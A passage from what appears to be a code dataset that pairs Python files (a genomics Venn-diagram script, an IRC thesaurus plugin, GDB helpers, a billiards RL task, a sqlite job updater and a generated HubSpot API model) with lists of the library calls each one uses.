if ar12[i][0]==ar3[j][0]:
triple.append([ar12[i][0], ar12[i][1], ar12[i][2], ar3[j][1]]) #GCSs coordinate, N3E_1, N3E_2, N3E_3
return triple
#Cfx_Micro_Oxo_shared_GCSs=triple_construction(Cfx_Micro_shared_GCSs, Oxo)
#print('Number of GCSs shared between Cfx, Micro and Oxo: ' + str(len(Cfx_Micro_Oxo_shared_GCSs)) +'\n')
#######
#Parses replicas, overlaps lists of GCSs, output data for Venn diagram construction.
#######
def replicates_parsing_to_list_and_overlapping(replicas_dict, name):
#Parsing
GCSs_dict={}
for k, v in replicas_dict.items(): #Iterate replicas.
GCSs_dict[k]=[]
for c, h in read_GCSs_file(v).items(): #Iterate GCSs.
GCSs_dict[k].append([c, h])
#Overlapping
one_two=pairs_construction(GCSs_dict[name+str(1)], GCSs_dict[name+str(2)])
one_three=pairs_construction(GCSs_dict[name+str(1)], GCSs_dict[name+str(3)])
two_three=pairs_construction(GCSs_dict[name+str(2)], GCSs_dict[name+str(3)])
one_two_three=triple_construction(one_two, GCSs_dict[name+str(3)])
#Venn input description (for 3 sets): one, two, three, one_two, one_three, two_three, one_two_three
venn_input=[len(GCSs_dict[name+str(1)])-len(one_two)-len(one_three)+len(one_two_three),
len(GCSs_dict[name+str(2)])-len(one_two)-len(two_three)+len(one_two_three),
len(one_two)-len(one_two_three),
len(GCSs_dict[name+str(3)])-len(one_three)-len(two_three)+len(one_two_three),
len(one_three)-len(one_two_three), len(two_three)-len(one_two_three),
len(one_two_three)]
return venn_input
#######
#Venn diagram represents GCSs sets overlapping.
#description2: one, two, one_two
#description3: one, two, one_two, three, one_three, two_three, one_two_three
#######
#venn_data_2=[len(Cfx)-len(Cfx_RifCfx_shared_GCSs), len(RifCfx)-len(Cfx_RifCfx_shared_GCSs), len(Cfx_RifCfx_shared_GCSs)]
#venn_data_3=[len(Cfx)-len(Cfx_Micro_shared_GCSs)-len(Cfx_Oxo_shared_GCSs)+len(Cfx_Micro_Oxo_shared_GCSs),
# len(Micro)-len(Cfx_Micro_shared_GCSs)-len(Micro_Oxo_shared_GCSs)+len(Cfx_Micro_Oxo_shared_GCSs),
# len(Cfx_Micro_shared_GCSs)-len(Cfx_Micro_Oxo_shared_GCSs),
# len(Oxo)-len(Cfx_Oxo_shared_GCSs)-len(Micro_Oxo_shared_GCSs)+len(Cfx_Micro_Oxo_shared_GCSs),
# len(Cfx_Oxo_shared_GCSs)-len(Cfx_Micro_Oxo_shared_GCSs),
# len(Micro_Oxo_shared_GCSs)-len(Cfx_Micro_Oxo_shared_GCSs),
# len(Cfx_Micro_Oxo_shared_GCSs)]
#venn2(subsets = (venn_data_2), set_labels = ("Ciprofloxacin", "Rifampicin Ciprofloxacin"))
#plt.savefig(plot_outpath+'Cfx_RifCfx_venn.png', dpi=320)
#plt.close()
#
#print("Cfx Micro Oxo subsets volumes: " + str(venn_data_3))
#venn3(subsets = (venn_data_3), set_labels = ('Ciprofloxacin', 'Microcin B17', 'Oxolinic acid'))
#plt.savefig(plot_outpath+'Cfx_Micro_Oxo_venn.png', dpi=320)
#plt.close()
#
#venn3(subsets = (replicates_parsing_to_list_and_overlapping(path_to_cfx_replicas, 'Cfx_')), set_labels = ('Cfx_1', 'Cfx_2', 'Cfx_3'))
#plt.savefig(plot_outpath+'Cfx_replicas_venn.png', dpi=320)
#plt.close()
#
#venn3(subsets = (replicates_parsing_to_list_and_overlapping(path_to_rifcfx_replicas, 'RifCfx_')), set_labels = ('RifCfx_1', 'RifCfx_2', 'RifCfx_3'))
#plt.savefig(plot_outpath+'RifCfx_replicas_venn.png', dpi=320)
#plt.close()
#
#venn3(subsets = (replicates_parsing_to_list_and_overlapping(path_to_microcin_replicas, 'Micro_')), set_labels = ('Micro_1', 'Micro_2', 'Micro_3'))
#plt.savefig(plot_outpath+'Micro_replicas_venn.png', dpi=320)
#plt.close()
#
#venn3(subsets = (replicates_parsing_to_list_and_overlapping(path_to_oxo_replicas, 'Oxo_')), set_labels = ('Oxo_1', 'Oxo_2', 'Oxo_3'))
#plt.savefig(plot_outpath+'Oxo_replicas_venn.png', dpi=320)
#plt.close()
#######
#GCSs sets average N3E estimation.
#######
def average_height(ar):
av_he=0
for i in range(len(ar)):
peak_he=np.mean(ar[i][1:])
av_he=av_he+peak_he
return av_he/len(ar)
#print('Cfx average GCSs N3E: ' + str(average_height(Cfx)))
#print('Micro average GCSs N3E: ' + str(average_height(Micro)))
#print('Oxo average GCSs N3E: ' + str(average_height(Oxo)))
#print('Cfx and Micro average GCSs N3E: ' + str(average_height(Cfx_Micro_shared_GCSs)))
#print('Cfx and Oxo average GCSs N3E: ' + str(average_height(Cfx_Oxo_shared_GCSs)))
#print('Micro and Oxo average GCSs N3E: ' + str(average_height(Micro_Oxo_shared_GCSs)))
#print('Cfx, Micro and Oxo average GCSs N3E: ' + str(average_height(Cfx_Micro_Oxo_shared_GCSs)) + '\n')
#######
#Write down files with GCSs lists - trusted or shared.
#######
#All_GCSs_sets={Cfx_path: Antibs_GCSs_sets[0],
# RifCfx_path: Antibs_GCSs_sets[1],
# Micro_path: Antibs_GCSs_sets[2],
# Oxo_path: Antibs_GCSs_sets[3],
# Cfx_Micro_path: Antibs_GCSs_sets_pair_shared[0],
# Cfx_Oxo_path: Antibs_GCSs_sets_pair_shared[1],
# Micro_Oxo_path: Antibs_GCSs_sets_pair_shared[2],
# Cfx_Micro_Oxo_path: Cfx_Micro_Oxo_shared_GCSs}
def write_GCSs_file(dictionary):
for k, v in dictionary.items(): #Iterates lists to be written
v.sort(key=lambda tup: tup[0]) #Sorting lists by the zero elements of the sublists they consist of
fileout=open(k, 'w')
fileout.write('GCSs_coordinate\tN3E\n')
for i in range(len(v)):
fileout.write(str(v[i][0]) + '\t' + str(np.mean(v[i][1:])) + '\n')
fileout.close()
return
#write_GCSs_file(All_GCSs_sets)
def write_Cfx_RifCfx_shared_GCSs(ar, path):
fileout=open(path, 'w')
fileout.write('GCSs_coordinate\tCfx_N3E\tRifCfx_N3E\n')
ar.sort(key=lambda tup: tup[0])
for i in range(len(ar)):
fileout.write(str(ar[i][0]) + '\t' + str(ar[i][1]) + '\t' + str(ar[i][2]) + '\n')
fileout.close()
return
#write_Cfx_RifCfx_shared_GCSs(Cfx_RifCfx_shared_GCSs, Cfx_RifCfx_shared_GCSs_path)
#
#print('Script ended its work succesfully!')
|
[
"numpy.mean",
"os.path.exists",
"os.makedirs"
] |
[((1698, 1731), 'os.path.exists', 'os.path.exists', (['Replicas_path_out'], {}), '(Replicas_path_out)\n', (1712, 1731), False, 'import os\n'), ((1737, 1767), 'os.makedirs', 'os.makedirs', (['Replicas_path_out'], {}), '(Replicas_path_out)\n', (1748, 1767), False, 'import os\n'), ((11670, 11688), 'numpy.mean', 'np.mean', (['ar[i][1:]'], {}), '(ar[i][1:])\n', (11677, 11688), True, 'import numpy as np\n'), ((13184, 13201), 'numpy.mean', 'np.mean', (['v[i][1:]'], {}), '(v[i][1:])\n', (13191, 13201), True, 'import numpy as np\n')]
|
"""
Original author: xnaas (2022)
License: The Unlicense (public domain)
"""
import requests
from sopel import plugin, formatting
from sopel.config.types import StaticSection, ValidatedAttribute
class ThesaurusSection(StaticSection):
api_key = ValidatedAttribute("api_key", str)
def setup(bot):
bot.config.define_section("thesaurus", ThesaurusSection)
def configure(config):
config.define_section("thesaurus", ThesaurusSection)
config.thesaurus.configure_setting("api_key", "dictionaryapi.com api key")
@plugin.command("syn", "synonym")
@plugin.output_prefix("[synonym] ")
def synonyms(bot, trigger):
word = formatting.plain(trigger.group(3))
url = f"https://www.dictionaryapi.com/api/v3/references/thesaurus/json/{word}"
key = {"key": bot.config.thesaurus.api_key}
try:
synonyms = requests.get(url, params=key).json()[0]["meta"]["syns"][0]
bot.say(", ".join(synonyms), max_messages=2)
except IndexError:
bot.reply("No results.")
@plugin.command("ant", "antonym")
@plugin.output_prefix("[antonym] ")
def antonyms(bot, trigger):
word = formatting.plain(trigger.group(3))
url = f"https://www.dictionaryapi.com/api/v3/references/thesaurus/json/{word}"
key = {"key": bot.config.thesaurus.api_key}
try:
antonyms = requests.get(url, params=key).json()[0]["meta"]["ants"][0]
bot.say(", ".join(antonyms), max_messages=2)
except IndexError:
bot.reply("No results.")
|
[
"sopel.plugin.command",
"sopel.plugin.output_prefix",
"sopel.config.types.ValidatedAttribute",
"requests.get"
] |
[((528, 560), 'sopel.plugin.command', 'plugin.command', (['"""syn"""', '"""synonym"""'], {}), "('syn', 'synonym')\n", (542, 560), False, 'from sopel import plugin, formatting\n'), ((562, 596), 'sopel.plugin.output_prefix', 'plugin.output_prefix', (['"""[synonym] """'], {}), "('[synonym] ')\n", (582, 596), False, 'from sopel import plugin, formatting\n'), ((1003, 1035), 'sopel.plugin.command', 'plugin.command', (['"""ant"""', '"""antonym"""'], {}), "('ant', 'antonym')\n", (1017, 1035), False, 'from sopel import plugin, formatting\n'), ((1037, 1071), 'sopel.plugin.output_prefix', 'plugin.output_prefix', (['"""[antonym] """'], {}), "('[antonym] ')\n", (1057, 1071), False, 'from sopel import plugin, formatting\n'), ((250, 284), 'sopel.config.types.ValidatedAttribute', 'ValidatedAttribute', (['"""api_key"""', 'str'], {}), "('api_key', str)\n", (268, 284), False, 'from sopel.config.types import StaticSection, ValidatedAttribute\n'), ((832, 861), 'requests.get', 'requests.get', (['url'], {'params': 'key'}), '(url, params=key)\n', (844, 861), False, 'import requests\n'), ((1307, 1336), 'requests.get', 'requests.get', (['url'], {'params': 'key'}), '(url, params=key)\n', (1319, 1336), False, 'import requests\n')]
|
import os
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = os.path.expanduser('~/.key.json')
|
[
"os.path.expanduser"
] |
[((57, 90), 'os.path.expanduser', 'os.path.expanduser', (['"""~/.key.json"""'], {}), "('~/.key.json')\n", (75, 90), False, 'import os\n')]
|
"""
Assorted utilities for HHVM GDB bindings.
"""
# @lint-avoid-python-3-compatibility-imports
import collections
import functools
import gdb
#------------------------------------------------------------------------------
# Memoization.
def memoized(func):
"""Simple memoization decorator that ignores **kwargs."""
cache = {}
@functools.wraps(func)
def memoizer(*args):
if not isinstance(args, collections.Hashable):
return func(*args)
if args not in cache:
cache[args] = func(*args)
return cache[args]
return memoizer
#------------------------------------------------------------------------------
# General-purpose helpers.
def parse_argv(args):
return [gdb.parse_and_eval(arg) for arg in gdb.string_to_argv(args)]
def vstr(value):
"""Stringify a value without pretty-printing."""
for pp in gdb.pretty_printers:
try:
pp.saved = pp.enabled
except AttributeError:
pp.saved = True
pp.enabled = False
ret = unicode(value)
for pp in gdb.pretty_printers:
pp.enabled = pp.saved
return ret
#------------------------------------------------------------------------------
# Caching lookups.
@memoized
def T(name):
return gdb.lookup_type(name)
@memoized
def V(name):
return gdb.lookup_symbol(name)[0].value()
@memoized
def K(name):
return gdb.lookup_global_symbol(name).value()
|
[
"gdb.lookup_type",
"gdb.lookup_symbol",
"functools.wraps",
"gdb.string_to_argv",
"gdb.parse_and_eval",
"gdb.lookup_global_symbol"
] |
[((345, 366), 'functools.wraps', 'functools.wraps', (['func'], {}), '(func)\n', (360, 366), False, 'import functools\n'), ((1284, 1305), 'gdb.lookup_type', 'gdb.lookup_type', (['name'], {}), '(name)\n', (1299, 1305), False, 'import gdb\n'), ((737, 760), 'gdb.parse_and_eval', 'gdb.parse_and_eval', (['arg'], {}), '(arg)\n', (755, 760), False, 'import gdb\n'), ((772, 796), 'gdb.string_to_argv', 'gdb.string_to_argv', (['args'], {}), '(args)\n', (790, 796), False, 'import gdb\n'), ((1411, 1441), 'gdb.lookup_global_symbol', 'gdb.lookup_global_symbol', (['name'], {}), '(name)\n', (1435, 1441), False, 'import gdb\n'), ((1341, 1364), 'gdb.lookup_symbol', 'gdb.lookup_symbol', (['name'], {}), '(name)\n', (1358, 1364), False, 'import gdb\n')]
|
__copyright__ = "Copyright (c) Microsoft Corporation and Mila - Quebec AI Institute"
__license__ = "MIT"
"""Billiards game
"""
__all__ = ("billiards_default_config", "Billiards", "BilliardsInitialization")
import math
from typing import Optional
import numpy as np
from segar.mdps.initializations import ArenaInitialization
from segar.mdps.rewards import dead_reward_fn, l2_distance_reward_fn
from segar.mdps.tasks import Task
from segar.rendering.rgb_rendering import register_color
from segar.factors import (
Label,
Mass,
Charge,
Shape,
Text,
Circle,
GaussianNoise,
Size,
Position,
ID,
Done,
Alive,
Visible,
Velocity,
)
from segar.rules import Prior
from segar.things import Ball, Hole, Entity, Object
from segar.sim.location_priors import RandomBottomLocation
_DEFAULT_CUEBALL_MASS = 1.0
_DEFAULT_CUEBALL_CHARGE = 1.0
_DEFAULT_BALL_MASS = 1.0
_DEFAULT_BALL_SIZE = 0.2
_DEFAULT_BALL_CHARGE = 1.0
_DEFAULT_HOLE_SIZE = 0.3
_DEFAULT_DEAD_REWARD = -100.0
_HOLE_DISTANCE_THRESH = 1e-4
_MAX_BALL_AT_GOAL_VEL = None
_ACTION_RANGE = (-100, 100)
def billiard_ball_positions(
start: list[float, float], r: float = _DEFAULT_BALL_SIZE / 2 + 1e-3, n: int = 10
) -> list[list[float, float]]:
x, y = start
sq2r = math.sqrt(2.0) * r
positions = [start]
positions += [[x - sq2r, y + sq2r], [x + sq2r, y + sq2r]]
positions += [
[x - 2 * sq2r, y + 2 * sq2r],
[x, y + 2 * sq2r],
[x + 2 * sq2r, y + 2 * sq2r],
]
positions += [
[x - 3 * sq2r, y + 3 * sq2r],
[x - sq2r, y + 3 * sq2r],
[x + sq2r, y + 3 * sq2r],
[x + 3 * sq2r, y + 3 * sq2r],
]
positions = positions[:n]
return positions
class CueBall(
Object,
default={
Label: "cueball",
Mass: _DEFAULT_CUEBALL_MASS,
Charge: _DEFAULT_CUEBALL_CHARGE,
Shape: Circle(0.2),
Text: "X",
ID: "cueball",
},
):
pass
billiards_default_config = {
"numbers": [(CueBall, 1)],
"priors": [
Prior(
Size,
GaussianNoise(
_DEFAULT_BALL_SIZE,
0.01,
clip=(_DEFAULT_BALL_SIZE / 2.0, 3 * _DEFAULT_BALL_SIZE / 2.0),
),
entity_type=CueBall,
),
Prior(Size, _DEFAULT_BALL_SIZE, entity_type=Ball),
Prior(Mass, _DEFAULT_BALL_MASS, entity_type=Ball),
Prior(Size, _DEFAULT_HOLE_SIZE, entity_type=Hole),
Prior(Position, RandomBottomLocation(), entity_type=CueBall),
],
}
class BilliardsInitialization(ArenaInitialization):
"""Initialization of billiards derived from arena initialization.
Adds a cueball, holes, and other billiard balls.
"""
def __init__(self, config=None):
self.cueball_id = None
self.ball_ids = []
self.hole_ids = []
super().__init__(config=config)
register_color("cueball", (255, 255, 255))
def sample(self, max_iterations: int = 100) -> list[Entity]:
self.ball_ids.clear()
self.hole_ids.clear()
sampled_things = super().sample(max_iterations=max_iterations)
ball_positions = billiard_ball_positions([0.0, 0.0])
for i, pos in enumerate(ball_positions):
ball = Ball({Position: pos, Text: f"{i + 1}", ID: f"{i + 1}_ball"})
sampled_things.append(ball)
hole_positions = [[-0.9, -0.9], [-0.9, 0.9], [0.9, -0.9], [0.9, 0.9]]
for i, pos in enumerate(hole_positions):
hole = Hole({Position: pos, ID: f"{i}_hole", Size: _DEFAULT_HOLE_SIZE})
sampled_things.append(hole)
has_cueball = False
has_balls = False
has_holes = False
for thing in sampled_things:
if isinstance(thing, CueBall):
has_cueball = True
self.cueball_id = thing[ID]
if isinstance(thing, Ball):
has_balls = True
self.ball_ids.append(thing[ID])
if isinstance(thing, Hole):
has_holes = True
self.hole_ids.append(thing[ID])
if not has_cueball:
raise ValueError("cueball wasn't created.")
if not has_balls:
raise ValueError("balls weren't created.")
if not has_holes:
raise ValueError("holes weren't created.")
return sampled_things
def set_arena(self, init_things: Optional[list[Entity]] = None) -> None:
super().set_arena(init_things)
if self.cueball_id is None:
raise RuntimeError("Cueball was not set in arena.")
if len(self.ball_ids) == 0:
raise RuntimeError("Balls not set in arena.")
if len(self.hole_ids) == 0:
raise RuntimeError("Holes not set in arena.")
class Billiards(Task):
"""Billiards game.
Agent controls the cue ball. Hit the cue ball into billiard balls and
get them into holes. Avoid getting the cue ball into the holes.
"""
def __init__(
self,
initialization: BilliardsInitialization,
action_range: tuple[float, float] = _ACTION_RANGE,
action_shape: tuple[int, ...] = (2,),
dead_reward: float = _DEFAULT_DEAD_REWARD,
hole_distance_threshold: float = _HOLE_DISTANCE_THRESH,
max_ball_at_hole_velocity: float = _MAX_BALL_AT_GOAL_VEL,
):
"""
:param initialization: Initialization object used for initializing
the arena.
:param action_range: Range of actions used by the agent.
:param action_shape: Shape of actions.
:param dead_reward: Reward when cue ball is `dead`.
:param hole_distance_threshold: Distance between billiard ball and hole
under which to stop.
:param max_ball_at_hole_velocity: Max billiard ball velocity under
which to stop.
"""
action_type = np.float16
baseline_action = np.array([0, 0]).astype(action_type)
super().__init__(
action_range=action_range,
action_shape=action_shape,
action_type=action_type,
baseline_action=baseline_action,
initialization=initialization,
)
self._dead_reward = dead_reward
self._hole_distance_threshold = hole_distance_threshold
self._max_ball_at_hole_velocity = max_ball_at_hole_velocity
@property
def cueball_id(self) -> ID:
if not hasattr(self._initialization, "cueball_id"):
raise AttributeError(
"Initialization must define `cueball_id` to " "be compatible with task."
)
cueball_id = self._initialization.cueball_id
if cueball_id is None:
raise ValueError("`cueball_id` is not set yet.")
return cueball_id
@property
def hole_ids(self) -> list[ID]:
if not hasattr(self._initialization, "hole_ids"):
raise AttributeError(
"Initialization must define `hole_ids` to " "be compatible with task."
)
hole_ids = self._initialization.hole_ids
return hole_ids
@property
def ball_ids(self) -> list[ID]:
if not hasattr(self._initialization, "ball_ids"):
raise AttributeError(
"Initialization must define `ball_ids` to " "be compatible with task."
)
ball_ids = self._initialization.ball_ids
return ball_ids
def reward(self, state: dict) -> float:
"""Reward determined by the distance of the billiard balls to the
nearest hold and whether the cue ball is in a hole (dead).
:param state: States
:return: (float) the reward.
"""
ball_state = state["things"][self.cueball_id]
dead_reward = dead_reward_fn(ball_state, self._dead_reward)
# Distance reward is tricky: can't do it directly from states
# because sim owns scaling
distance_reward = 0.0
for ball_id in self.ball_ids:
distance = min([self.sim.l2_distance(ball_id, hole_id) for hole_id in self.hole_ids])
if distance <= self._hole_distance_threshold:
self.sim.change_thing_state(ball_id, Alive, False)
self.sim.change_thing_state(ball_id, Visible, False)
distance_reward += l2_distance_reward_fn(distance)
return dead_reward + distance_reward
def done(self, state: dict) -> bool:
"""Episode is done if the cue ball is dead or if all of the billiard
balls are in the holes.
:param state: The states.
:return: True if the state indicates the environment is done.
"""
ball_state = state["things"][self.cueball_id]
is_finished = ball_state[Done] or not ball_state[Alive]
balls_are_finished = True
for ball_id in self.ball_ids:
ball_state = state["things"][ball_id]
ball_is_finished = ball_state[Done] or not ball_state[Alive]
balls_are_finished = balls_are_finished and ball_is_finished
return is_finished or balls_are_finished
def apply_action(self, force: np.ndarray) -> None:
"""Applies force to the cue ball.
:param force: (np.array) Force to apply
"""
self.sim.add_force(self.cueball_id, force)
def results(self, state: dict) -> dict:
"""Results for monitoring task.
:param state: States
:return: Dictionary of results.
"""
distance = min(
[self.sim.l2_distance(self.cueball_id, hole_id) for hole_id in self.hole_ids]
)
ball_state = state["things"][self.cueball_id]
return dict(
dist_to_goal=distance,
velocity=ball_state[Velocity].norm(),
mass=ball_state[Mass].value,
alive=ball_state[Alive].value,
)
def demo_action(self):
"""Generate an action used for demos
:return: np.array action
"""
return np.random.normal() + np.array((4, 3))
|
[
"math.sqrt",
"segar.things.Hole",
"segar.sim.location_priors.RandomBottomLocation",
"segar.factors.GaussianNoise",
"segar.rules.Prior",
"segar.mdps.rewards.l2_distance_reward_fn",
"numpy.array",
"segar.factors.Circle",
"segar.things.Ball",
"numpy.random.normal",
"segar.mdps.rewards.dead_reward_fn",
"segar.rendering.rgb_rendering.register_color"
] |
[((1278, 1292), 'math.sqrt', 'math.sqrt', (['(2.0)'], {}), '(2.0)\n', (1287, 1292), False, 'import math\n'), ((1893, 1904), 'segar.factors.Circle', 'Circle', (['(0.2)'], {}), '(0.2)\n', (1899, 1904), False, 'from segar.factors import Label, Mass, Charge, Shape, Text, Circle, GaussianNoise, Size, Position, ID, Done, Alive, Visible, Velocity\n'), ((2309, 2358), 'segar.rules.Prior', 'Prior', (['Size', '_DEFAULT_BALL_SIZE'], {'entity_type': 'Ball'}), '(Size, _DEFAULT_BALL_SIZE, entity_type=Ball)\n', (2314, 2358), False, 'from segar.rules import Prior\n'), ((2368, 2417), 'segar.rules.Prior', 'Prior', (['Mass', '_DEFAULT_BALL_MASS'], {'entity_type': 'Ball'}), '(Mass, _DEFAULT_BALL_MASS, entity_type=Ball)\n', (2373, 2417), False, 'from segar.rules import Prior\n'), ((2427, 2476), 'segar.rules.Prior', 'Prior', (['Size', '_DEFAULT_HOLE_SIZE'], {'entity_type': 'Hole'}), '(Size, _DEFAULT_HOLE_SIZE, entity_type=Hole)\n', (2432, 2476), False, 'from segar.rules import Prior\n'), ((2918, 2960), 'segar.rendering.rgb_rendering.register_color', 'register_color', (['"""cueball"""', '(255, 255, 255)'], {}), "('cueball', (255, 255, 255))\n", (2932, 2960), False, 'from segar.rendering.rgb_rendering import register_color\n'), ((7782, 7827), 'segar.mdps.rewards.dead_reward_fn', 'dead_reward_fn', (['ball_state', 'self._dead_reward'], {}), '(ball_state, self._dead_reward)\n', (7796, 7827), False, 'from segar.mdps.rewards import dead_reward_fn, l2_distance_reward_fn\n'), ((2090, 2196), 'segar.factors.GaussianNoise', 'GaussianNoise', (['_DEFAULT_BALL_SIZE', '(0.01)'], {'clip': '(_DEFAULT_BALL_SIZE / 2.0, 3 * _DEFAULT_BALL_SIZE / 2.0)'}), '(_DEFAULT_BALL_SIZE, 0.01, clip=(_DEFAULT_BALL_SIZE / 2.0, 3 *\n _DEFAULT_BALL_SIZE / 2.0))\n', (2103, 2196), False, 'from segar.factors import Label, Mass, Charge, Shape, Text, Circle, GaussianNoise, Size, Position, ID, Done, Alive, Visible, Velocity\n'), ((2502, 2524), 'segar.sim.location_priors.RandomBottomLocation', 'RandomBottomLocation', ([], {}), '()\n', (2522, 2524), False, 'from segar.sim.location_priors import RandomBottomLocation\n'), ((3289, 3349), 'segar.things.Ball', 'Ball', (["{Position: pos, Text: f'{i + 1}', ID: f'{i + 1}_ball'}"], {}), "({Position: pos, Text: f'{i + 1}', ID: f'{i + 1}_ball'})\n", (3293, 3349), False, 'from segar.things import Ball, Hole, Entity, Object\n'), ((3537, 3601), 'segar.things.Hole', 'Hole', (["{Position: pos, ID: f'{i}_hole', Size: _DEFAULT_HOLE_SIZE}"], {}), "({Position: pos, ID: f'{i}_hole', Size: _DEFAULT_HOLE_SIZE})\n", (3541, 3601), False, 'from segar.things import Ball, Hole, Entity, Object\n'), ((8325, 8356), 'segar.mdps.rewards.l2_distance_reward_fn', 'l2_distance_reward_fn', (['distance'], {}), '(distance)\n', (8346, 8356), False, 'from segar.mdps.rewards import dead_reward_fn, l2_distance_reward_fn\n'), ((9998, 10016), 'numpy.random.normal', 'np.random.normal', ([], {}), '()\n', (10014, 10016), True, 'import numpy as np\n'), ((10019, 10035), 'numpy.array', 'np.array', (['(4, 3)'], {}), '((4, 3))\n', (10027, 10035), True, 'import numpy as np\n'), ((5943, 5959), 'numpy.array', 'np.array', (['[0, 0]'], {}), '([0, 0])\n', (5951, 5959), True, 'import numpy as np\n')]
|
import os
import sqlite3
from datetime import datetime
abs_path = os.getcwd()
split = os.path.split(abs_path)
workflow_db_path = os.path.join(
split[0], "pipeline/deplatformr_open_images_workflow.sqlite")
workflow_db = sqlite3.connect(workflow_db_path)
cursor = workflow_db.cursor()
utctime = datetime.utcnow()
with open("updated_jobs.txt", "r") as jobs_list:
jobs = jobs_list.readlines()
for job in jobs:
split = job.split(",")
cursor.execute("UPDATE jobs set job_id=?, timestamp=?, status=? WHERE cid=?",
(split[1], utctime, "JOB_STATUS_EXECUTING", split[0],),)
workflow_db.commit()
workflow_db.close()
|
[
"os.getcwd",
"datetime.datetime.utcnow",
"sqlite3.connect",
"os.path.split",
"os.path.join"
] |
[((68, 79), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (77, 79), False, 'import os\n'), ((88, 111), 'os.path.split', 'os.path.split', (['abs_path'], {}), '(abs_path)\n', (101, 111), False, 'import os\n'), ((132, 206), 'os.path.join', 'os.path.join', (['split[0]', '"""pipeline/deplatformr_open_images_workflow.sqlite"""'], {}), "(split[0], 'pipeline/deplatformr_open_images_workflow.sqlite')\n", (144, 206), False, 'import os\n'), ((227, 260), 'sqlite3.connect', 'sqlite3.connect', (['workflow_db_path'], {}), '(workflow_db_path)\n', (242, 260), False, 'import sqlite3\n'), ((302, 319), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (317, 319), False, 'from datetime import datetime\n')]
|
# coding: utf-8
"""
Accounting Extension
These APIs allow you to interact with HubSpot's Accounting Extension. It allows you to: * Specify the URLs that HubSpot will use when making webhook requests to your external accounting system. * Respond to webhook calls made to your external accounting system by HubSpot # noqa: E501
The version of the OpenAPI document: v3
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from hubspot.crm.extensions.accounting.configuration import Configuration
class AccountingAppUrls(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'get_invoice_url': 'str',
'search_customer_url': 'str',
'get_invoice_pdf_url': 'str',
'customer_url_template': 'str',
'product_url_template': 'str',
'invoice_url_template': 'str',
'create_invoice_url': 'str',
'search_invoice_url': 'str',
'search_product_url': 'str',
'get_terms_url': 'str',
'create_customer_url': 'str',
'search_tax_url': 'str',
'exchange_rate_url': 'str',
'search_url': 'str',
'search_count_url': 'str'
}
attribute_map = {
'get_invoice_url': 'getInvoiceUrl',
'search_customer_url': 'searchCustomerUrl',
'get_invoice_pdf_url': 'getInvoicePdfUrl',
'customer_url_template': 'customerUrlTemplate',
'product_url_template': 'productUrlTemplate',
'invoice_url_template': 'invoiceUrlTemplate',
'create_invoice_url': 'createInvoiceUrl',
'search_invoice_url': 'searchInvoiceUrl',
'search_product_url': 'searchProductUrl',
'get_terms_url': 'getTermsUrl',
'create_customer_url': 'createCustomerUrl',
'search_tax_url': 'searchTaxUrl',
'exchange_rate_url': 'exchangeRateUrl',
'search_url': 'searchUrl',
'search_count_url': 'searchCountUrl'
}
def __init__(self, get_invoice_url=None, search_customer_url=None, get_invoice_pdf_url=None, customer_url_template=None, product_url_template=None, invoice_url_template=None, create_invoice_url=None, search_invoice_url=None, search_product_url=None, get_terms_url=None, create_customer_url=None, search_tax_url=None, exchange_rate_url=None, search_url=None, search_count_url=None, local_vars_configuration=None): # noqa: E501
"""AccountingAppUrls - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._get_invoice_url = None
self._search_customer_url = None
self._get_invoice_pdf_url = None
self._customer_url_template = None
self._product_url_template = None
self._invoice_url_template = None
self._create_invoice_url = None
self._search_invoice_url = None
self._search_product_url = None
self._get_terms_url = None
self._create_customer_url = None
self._search_tax_url = None
self._exchange_rate_url = None
self._search_url = None
self._search_count_url = None
self.discriminator = None
self.get_invoice_url = get_invoice_url
self.search_customer_url = search_customer_url
self.get_invoice_pdf_url = get_invoice_pdf_url
self.customer_url_template = customer_url_template
self.product_url_template = product_url_template
self.invoice_url_template = invoice_url_template
if create_invoice_url is not None:
self.create_invoice_url = create_invoice_url
if search_invoice_url is not None:
self.search_invoice_url = search_invoice_url
if search_product_url is not None:
self.search_product_url = search_product_url
if get_terms_url is not None:
self.get_terms_url = get_terms_url
if create_customer_url is not None:
self.create_customer_url = create_customer_url
if search_tax_url is not None:
self.search_tax_url = search_tax_url
if exchange_rate_url is not None:
self.exchange_rate_url = exchange_rate_url
if search_url is not None:
self.search_url = search_url
if search_count_url is not None:
self.search_count_url = search_count_url
@property
def get_invoice_url(self):
"""Gets the get_invoice_url of this AccountingAppUrls. # noqa: E501
A URL that specifies the endpoint where invoices can be retrieved. # noqa: E501
:return: The get_invoice_url of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._get_invoice_url
@get_invoice_url.setter
def get_invoice_url(self, get_invoice_url):
"""Sets the get_invoice_url of this AccountingAppUrls.
A URL that specifies the endpoint where invoices can be retrieved. # noqa: E501
:param get_invoice_url: The get_invoice_url of this AccountingAppUrls. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and get_invoice_url is None: # noqa: E501
raise ValueError("Invalid value for `get_invoice_url`, must not be `None`") # noqa: E501
self._get_invoice_url = get_invoice_url
@property
def search_customer_url(self):
"""Gets the search_customer_url of this AccountingAppUrls. # noqa: E501
A URL that specifies the endpoint where a customer search can be performed. # noqa: E501
:return: The search_customer_url of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._search_customer_url
@search_customer_url.setter
def search_customer_url(self, search_customer_url):
"""Sets the search_customer_url of this AccountingAppUrls.
A URL that specifies the endpoint where a customer search can be performed. # noqa: E501
:param search_customer_url: The search_customer_url of this AccountingAppUrls. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and search_customer_url is None: # noqa: E501
raise ValueError("Invalid value for `search_customer_url`, must not be `None`") # noqa: E501
self._search_customer_url = search_customer_url
@property
def get_invoice_pdf_url(self):
"""Gets the get_invoice_pdf_url of this AccountingAppUrls. # noqa: E501
A URL that specifies the endpoint where an invoice PDF can be retrieved. # noqa: E501
:return: The get_invoice_pdf_url of this AccountingAppUrls. # noqa: E501
